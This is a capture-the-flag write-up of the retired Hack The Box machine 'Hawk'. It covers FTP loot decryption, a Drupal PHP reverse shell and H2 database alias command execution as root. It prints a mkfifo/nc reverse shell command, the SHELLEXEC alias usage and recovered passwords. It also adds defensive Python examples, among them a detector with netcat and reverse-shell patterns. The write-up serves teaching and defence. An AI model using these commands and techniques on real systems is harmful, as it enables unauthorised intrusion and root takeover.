Hackthebox - Retired - Hawk
Recon
I've started to use Threader3000 for my initial recon scans. It uses threaded scans to make the initial pass much quicker. Then, based on the results of that initial scan, it recommends an nmap scan for just the open ports, and it also saves all the results for historical purposes. I like Threader3000.
Here is the first scan and the optional nmap scan that we can now run based on the results. I used to do this manually: scan all TCP ports, then run a second, more aggressive scan based on the results of the first. Now this tool automates that for me :)
Here is the output XML converted to HTML to make it pretty:
xsltproc ./hawk.htb.xml -o ./hawk.htb.html
OK so we have
Port 21 vsftpd version 3.03
Port 22 OpenSSH version 7.6p1
Port 80 Apache version 2.4.29
Port 5435 Something?
Port 8082 H2 Database http console
Port 9092 XMLpcREGSVC <- whatever that is
And according to the results we have anonymous FTP access on port 21. Let's connect to see what is there.
ftp
open hawk.htb
Username: anonymous
Password: anonymous
There is a directory called messages which contains a file called .drupal.txt.enc. I used mget to download it to my Kali box:
mget .drupal.txt.enc
Then read the file with cat
cat ./.drupal.txt.enc
U2FsdGVkX19rWSAG1JNpLTawAmzz/ckaN1oZFZewtIM+e84km3Csja3GADUg2jJb
CmSdwTtr/IIShvTbUd0yQxfe9OuoMxxfNIUN/YPHx+vVw/6eOD+Cc1ftaiNUEiQz
QUf9FyxmCb2fuFoOXGphAMo+Pkc2ChXgLsj4RfgX+P7DkFa8w1ZA9Yj7kR+tyZfy
t4M0qvmWvMhAj3fuuKCCeFoXpYBOacGvUHRGywb4YCk=
Some crazy base64-encoded something or other. Let's get rid of the base64:
cat .drupal.txt.enc | base64 -d
Salted__kY ԓi-6'l'''▒7Z''''>{'$'p''''5 '2[
'''''''''8?'sW'j#T$3AG',f '''Z\ja'>>G6
'.''E'''ÐV''V@'''''ɗ'''4'''''@'w'xZ''Ni''PtF''`)
Hmmm, a bit of that is English… Salted?
Let's see if we can get any more info about this and use file to see if it knows what kind of file this is.
file .drupal.txt.enc
file reports openssl enc'd data with salted password. Well, if they went through the trouble of encrypting it, we can go through the trouble of trying to decrypt it.
We first need to un-base64 this, which we can just do in bash.
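As an added example, not code from the original post or from any tool it links: this Python script parses the "Salted__" envelope that openssl enc produces, using the base64 blob above as input, and reproduces the legacy EVP_BytesToKey derivation that openssl enc -k uses when no -pbkdf2 is given. It shows why the digest has to be guessed (sha256 versus md5 changes the derived key) and why a single-hash derivation gives a dictionary-word passphrase almost no protection. The passphrase friends is the one the writeup recovers later; the key-derivation helper and the check function are assumptions of this example, not part of the original page.

```python
import base64
import hashlib

# The base64 text recovered from the FTP share, copied from the writeup above.
DRUPAL_TXT_ENC_B64 = (
    "U2FsdGVkX19rWSAG1JNpLTawAmzz/ckaN1oZFZewtIM+e84km3Csja3GADUg2jJb"
    "CmSdwTtr/IIShvTbUd0yQxfe9OuoMxxfNIUN/YPHx+vVw/6eOD+Cc1ftaiNUEiQz"
    "QUf9FyxmCb2fuFoOXGphAMo+Pkc2ChXgLsj4RfgX+P7DkFa8w1ZA9Yj7kR+tyZfy"
    "t4M0qvmWvMhAj3fuuKCCeFoXpYBOacGvUHRGywb4YCk="
)

MAGIC = b"Salted__"
BLOCK = 16  # AES block size; openssl enc CBC output is always a multiple of this


def parse_salted(blob):
    """Split an `openssl enc -salt` envelope into its salt and ciphertext.

    The layout is fixed: 8-byte magic "Salted__", 8-byte random salt, ciphertext.
    Raises ValueError if the envelope is malformed or not block aligned.
    """
    if not blob.startswith(MAGIC):
        raise ValueError("not an openssl salted envelope")
    salt = blob[8:16]
    ciphertext = blob[16:]
    if len(salt) != 8 or not ciphertext or len(ciphertext) % BLOCK != 0:
        raise ValueError("truncated envelope or non-block-aligned ciphertext")
    return salt, ciphertext


def evp_bytes_to_key(password, salt, key_len=32, iv_len=16, digest="sha256"):
    """Legacy EVP_BytesToKey derivation used by `openssl enc -k PASS` (no -pbkdf2).

    With the default single iteration each block is D_i = H(D_{i-1} || pass || salt),
    so a candidate key costs exactly one hash computation. Defaults match
    aes-256-cbc (32-byte key, 16-byte IV) with OpenSSL's sha256 default digest.
    """
    out = b""
    prev = b""
    while len(out) < key_len + iv_len:
        prev = hashlib.new(digest, prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]


def describe(b64_text):
    """Decode the base64 wrapper and report the salt and ciphertext block count."""
    blob = base64.b64decode(b64_text)
    salt, ciphertext = parse_salted(blob)
    return {"salt_hex": salt.hex(), "blocks": len(ciphertext) // BLOCK}


if __name__ == "__main__":
    info = describe(DRUPAL_TXT_ENC_B64)
    print(f"salt={info['salt_hex']} ciphertext_blocks={info['blocks']}")
    # Same passphrase, two digests: different keys, which is why the digest must be guessed.
    for d in ("sha256", "md5"):
        key, iv = evp_bytes_to_key(b"friends", bytes.fromhex(info["salt_hex"]), digest=d)
        print(f"{d}: key={key.hex()} iv={iv.hex()}")
```

The defensive takeaway is that the envelope itself is fine; the weakness is the key derivation. Current OpenSSL releases accept -pbkdf2 with -iter to replace this one-hash derivation with an iterated one, and a passphrase that is not in a wordlist is what actually stops the brute-force step described next.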
Googling around for ways to get at this, I found this program:
https://manpages.debian.org/testing/bruteforce-salted-openssl/bruteforce-salted-openssl.1.en.html
Which we can install with apt
sudo apt-get install bruteforce-salted-openssl
Looking at the switches available, we need to supply just a couple of things to try this out:
The encrypted file
The wordlist to use
The digest used
We know two of these already: the wordlist we want to use is rockyou.txt, and the encrypted file is .drupal.txt (decoded from base64 as drupal.txt).
We are going to have to guess the digest. From experience I would suggest sha256, since that is what I've seen most often.
So our final command would be
bruteforce-salted-openssl -t 50 -f /usr/share/wordlists/rockyou.txt -d sha256 ./drupal.txt
The -t is just how many threads we want to use.
Looks like the password used to encrypt the file is friends.
So now we can use openssl to try and see what is in the file
This site will walk us through that process ( hopefully )
https://www.shellhacks.com/encrypt-decrypt-file-password-openssl/
Here is the example they give for a password-protected file:
openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt -k PASS
So we will modify that for our use (I tried sha-256 here and some other switches and got a bunch of different errors):
openssl aes-256-cbc -d -in ./drupal.txt -out ./dectypted.txt -k friends
Now we get this when we cat our output file:
Looks like we have a name and a password now
Daniel
PencilKeyboardScanner123
Okay, so that was what we could find on the FTP port. Let's see what is available on port 80.
Unsurprisingly we see a Drupal page with a login form. Drupal is a Content Management System.
Let's try the username of Daniel and the password we found
Nope. What if we try admin instead? BINGO.
So I found this site which will help us get a foothold through the site:
https://www.sevenlayers.com/index.php/164-drupal-to-reverse-shell
The premise is pretty simple: enable PHP, then add a new page containing our PHP exploit.
So let's start with enabling PHP.
Choose modules at the top
Find PHP Filter and click enable
Then scroll to the bottom and save configuration
Now we need to modify the PHP filter permissions
Still following along with the blog we found, we need to give administrator users the right to use PHP code.
So click the administrator box and then scroll down and save again.
Now we should be able to add php code to Drupal. Let's test with a php info page.
Let's add new content.
Let's make a "basic page"
We need to change the text format to PHP Code, then add phpinfo(); to the body and give it a name.
Now when we scroll down and preview, we get this:
The phpinfo page.
Great, now we know we can add PHP to the site, and with that knowledge we can move on to exploiting this Drupal to get a reverse shell.
I'm going to use the reverse PHP shell from pentestmonkey's site. Monkeys got monkey.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Exploit
OK, before we can get this going let's download the PHP. We need to edit two fields in it: IP and PORT.
These need to be changed to our VPN IP and the port we want to listen on.
Here are the results for my machine, using port 5555 and my VPN IP address.
To catch the shell we need to set up a listener on our Kali box:
nc -lnvp 5555
Now I just need to copy and paste this into the body of the PHP test page we created earlier and do a new preview.
When we preview, we catch the shell.
Alright, we have a foothold as www-data. Let's start poking around to see if we can find a way to escalate from this account to another one.
Normally on HackTheBox we don't get immediate access to the user folder to read user.txt as www-data, but this box does: we can get into daniel's /home/daniel folder and cat out the user.txt file.
I always find it useful on HackTheBox to poke around in the /var/www folder; a lot of the time there are credentials in there. I found this in /var/www/html/sites/default:
settings.php
Looks like another set of creds. This shell is kinda crappy, so I want to see if we can get into SSH with these creds.
User drupal didn't work.
But daniel did… but
it drops us into Python…
Luckily we can escape out of this.
First we import os, then launch /bin/bash:
import os
os.system("/bin/bash")
OK, now we have a proper shell to see how we might escalate.
One of the first things I always check is the sudoers file to see if they have any rights..
Nope
OK, let's use netcat to copy over linpeas.sh to do some enumeration for us:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
On my Kali box I'll set up a listener:
nc -lnvp 5555 < ./linpeas.sh
Then on hawk we get the file with:
nc 10.10.14.6 5555 > linpeas.sh
Then we need to give linpeas.sh execute rights on hawk:
chmod +x ./linpeas.sh
Then we can run linpeas.sh on hawk:
./linpeas.sh
There are no obvious paths I can see here, like SUID/SGID files or cron jobs. Let's look back at our initial recon to see what else is on this box.
There are three other ports we haven't looked at yet or found a use for:
Port 5435 Something?
Port 8082 H2 Database http console
Port 9092 XMLpcREGSVC <- whatever that is
What is that H2 database?
Let's try pulling up the site in our browser.
No remote connections, huh? No worries, we have a local connection now anyway.
Curl gives a redirect notice.
But I want to see exactly what the site shows, to see if we can get some info off it…
For this let's use an SSH tunnel.
Since we have SSH access to the machine, we create a local port on our Kali box and forward all requests from that local port to the hawk local port over SSH:
ssh -L 5555:localhost:8082 daniel@hawk.htb
Let's break this down if you're not familiar.
ssh you should know.
-L is to create a local port forward.
5555:localhost:8082
With this last part we are creating local port 5555 on our Kali box and forwarding anything we send to that port to port 8082 on hawk.
Then we just authenticate to our SSH session and we can browse port 8082 of hawk on our local port 5555.
Pretty cool, right?
Here is the setting that denied our initial requests before we set up our tunnel:
Googling around for an H2 exploit, I first came across this one:
https://www.exploit-db.com/exploits/45506
Which basically says you can create a new database by changing the connection string: it will automatically create that database, and there will be no password for the SA account on that newly created DB… What the what?
So on the test connection string I just added circusmonkey after test, and was greeted with a brand new DB that I have full control of:
jdbc:h2:tcp://localhost/~/testcircusmonkey
I found this next exploit: when creating an alias in H2, we can create an alias to files on the system, but we can also use it to create aliases for executables…
So I just popped their alias string into my new DB:
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
No errors, that's good. Now we should be able to pass anything we want to the console through this alias:
CALL SHELLEXEC('id')
Root, this is running as root.
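Added example, not part of the original writeup or of the H2 project: a small Python audit of an H2 Console settings file (~/.h2.server.properties) that flags the conditions the last two findings depend on. It checks whether the console accepts remote connections (webAllowOthers, the setting that denied us earlier), whether saved connection URLs carry ;IFEXISTS=TRUE (H2's documented switch to refuse auto-creating a database named in the URL, which is what the exploit-db entry abuses to get a fresh DB with a passwordless sa), and whether the default sa account is stored in a saved connection. Both property blocks are constructed samples in the format the console writes (name|driver|url|user per saved connection); the finding texts are this example's own.

```python
import re

# Constructed sample resembling the weak state on the box: console reachable,
# no TLS, saved connection that will happily create any database name it is given.
WEAK_PROPERTIES = """\
webAllowOthers=true
webPort=8082
webSSL=false
0=Generic H2 (Server)|org.h2.Driver|jdbc:h2:tcp://localhost/~/test|sa
"""

# Constructed hardened counterpart: local-only console over TLS, existing DBs only,
# and a non-default application account instead of sa.
HARDENED_PROPERTIES = """\
webAllowOthers=false
webPort=8082
webSSL=true
0=Generic H2 (Server)|org.h2.Driver|jdbc:h2:tcp://localhost/~/test;IFEXISTS=TRUE|app_user
"""

CONNECTION_FIELDS = ("name", "driver", "url", "user")


def parse_properties(text):
    """Return (settings, saved_connections) from .h2.server.properties content.

    Plain keys are console settings; numeric keys are saved connections stored as
    name|driver|url|user. Lines that do not fit either shape are ignored.
    """
    settings, connections = {}, []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if key.isdigit():
            fields = value.split("|")
            if len(fields) == len(CONNECTION_FIELDS):
                connections.append(dict(zip(CONNECTION_FIELDS, fields)))
        else:
            settings[key.strip()] = value.strip()
    return settings, connections


def audit(text):
    """List the risky conditions found in a properties file, empty if none."""
    settings, connections = parse_properties(text)
    findings = []
    if settings.get("webAllowOthers", "false").lower() == "true":
        findings.append("webAllowOthers=true: console reachable from other hosts")
        if settings.get("webSSL", "false").lower() != "true":
            findings.append("webSSL=false: remote console logins travel in cleartext")
    for c in connections:
        url = c["url"]
        if not re.search(r";IFEXISTS=TRUE(?:;|$)", url, re.IGNORECASE):
            findings.append(
                f"{c['name']}: {url} lacks ;IFEXISTS=TRUE, so any new database "
                "name in the URL is created on the fly (new DB, sa, empty password)"
            )
        if c["user"].lower() == "sa":
            findings.append(f"{c['name']}: default administrative account 'sa' in saved connection")
    return findings


if __name__ == "__main__":
    for label, props in (("weak", WEAK_PROPERTIES), ("hardened", HARDENED_PROPERTIES)):
        print(f"[{label}] findings: {audit(props) or 'none'}")
```

On the server side the same "existing databases only" behaviour is available as the -ifExists option when starting the H2 server, and the h2.allowedClasses system property restricts which Java classes CREATE ALIAS may reference, which is the mechanism the SHELLEXEC alias relies on. Those two knobs plus a real password on sa are what would have stopped this chain.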
Pretty trivial here to pop out the root.txt file.
But what is the fun of just reading a txt file? I want a root shell.
I set up a new listener on my Kali box on port 5566:
nc -lnvp 5566
I tried netcat and some other standard shells and couldn't get it to connect. I switched back to my SSH session and tried them manually, and could only get mkfifo to work:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 5566>/tmp/f
SHELLEXEC doesn't work when I try this directly, so I had it echoed out to a file named rs.sh in the tmp folder I created earlier.
I used my existing shell to create the file,
then used the DB to give it execute rights:
CALL SHELLEXEC('chmod +x /tmp/circusmonkey/rs.sh')
Now hopefully we can just call it from the DB for our shell.
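Added example, not from the original post: detection logic a defender could run over process-creation records (auditd, EDR, or similar) to catch the pattern used in this last step: a database service running as root spawning /bin/sh, a named pipe in /tmp wired to nc, an interactive shell on a pipe, and a script staged in /tmp. The records are constructed in a simplified "pid user parent cmdline" form; the regular expressions and the list of service parents are this example's assumptions, not rules from any product.

```python
import re

# Constructed process-creation records: "pid user parent cmdline".
# The root/java lines mimic what the H2 alias in this writeup would produce.
SAMPLE_EVENTS = [
    "4120 root java /bin/sh -c id",
    "4133 root java /bin/sh -c chmod +x /tmp/circusmonkey/rs.sh",
    "4140 root java /bin/sh -c /tmp/circusmonkey/rs.sh",
    "4141 root sh mkfifo /tmp/f",
    "4142 root sh nc 10.10.14.6 5566",
    "4150 root java /bin/sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 5566>/tmp/f",
    "2210 daniel bash ls -la /home/daniel",
    "2215 www-data apache2 /bin/sh -c uname -a",
    "3001 root cron /usr/sbin/logrotate /etc/logrotate.conf",
]

# Service processes that have no business launching a shell (assumed list).
SUSPICIOUS_PARENTS = {"java", "mysqld", "postgres", "apache2"}

# Each pattern targets one building block of the shell used above.
PATTERNS = {
    "named pipe for shell i/o": re.compile(r"\bmkfifo\s+/tmp/\S+"),
    "netcat connecting out": re.compile(
        r"\bnc(?:at)?\b(?:\s+-\w+)*\s+\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b"
    ),
    "interactive shell on a pipe": re.compile(r"/bin/(?:ba)?sh\s+-i\b"),
    "bash /dev/tcp socket": re.compile(r"/dev/tcp/"),
    "script in /tmp": re.compile(r"/tmp/\S+\.sh\b"),
}

SHELL_RE = re.compile(r"/bin/(?:ba)?sh\b")


def parse_event(line):
    """Split one record into its fields; cmdline keeps all remaining text."""
    pid, user, parent, cmdline = line.split(" ", 3)
    return {"pid": int(pid), "user": user, "parent": parent, "cmdline": cmdline}


def classify(event):
    """Return the list of reasons an event looks like reverse-shell activity."""
    reasons = [name for name, rx in PATTERNS.items() if rx.search(event["cmdline"])]
    if event["parent"] in SUSPICIOUS_PARENTS and SHELL_RE.match(event["cmdline"]):
        reasons.append(f"shell spawned by service process {event['parent']}")
        if event["user"] == "root":
            reasons.append("service running as root")
    return reasons


def triage(lines):
    """Map pid -> reasons for every record that tripped at least one rule."""
    return {e["pid"]: r for e in map(parse_event, lines) if (r := classify(e))}


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Two of the findings are the cheap, high-value ones to alert on regardless of the rest: a JVM or database daemon spawning /bin/sh at all, and any daemon doing so as root, which is the condition that turned a console misconfiguration into a root shell here.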
That was fun.